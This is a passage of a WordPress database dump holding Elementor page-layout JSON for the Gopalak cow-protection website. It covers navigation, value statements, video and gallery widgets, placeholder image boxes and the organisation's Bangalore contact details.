here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9214,1584,'_elementor_page_assets','a:0:{}'),(9225,1586,'_elementor_edit_mode','builder'),(9226,1586,'_elementor_template_type','wp-page'),(9227,1586,'_elementor_version','3.7.8'),(9228,1586,'_wp_page_template','elementor_canvas'),(9229,1586,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adobt\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":39,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":39,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_